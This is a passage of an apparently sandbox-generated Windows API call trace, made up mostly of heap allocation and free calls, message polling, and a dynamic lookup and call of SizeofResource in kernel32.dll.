hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.707] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.708] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.708] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0119.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300d90 [0119.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.709] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0119.709] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0119.709] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0119.710] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0119.710] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0119.710] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0119.710] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0119.711] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0119.711] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0119.711] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0119.711] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0119.711] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0119.712] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0119.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0119.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458fd8 [0119.712] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff118 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7c0 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0119.714] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0119.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0119.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0119.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0119.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.715] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.715] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.715] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0119.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0119.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf) returned 0x14bd808 [0119.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x14bd808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SizeofResource", lpUsedDefaultChar=0x0) returned 15 [0119.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0119.716] GetProcAddress (hModule=0x74650000, lpProcName="SizeofResource") returned 0x74668f80 [0119.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0119.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff370 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff370 | out: hHeap=0x12c0000) returned 1 [0119.717] SizeofResource (hModule=0x0, hResInfo=0xfe7698) returned 0x1c211 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd7f0 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd850 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0119.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0119.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0119.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0119.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0119.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0119.718] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: 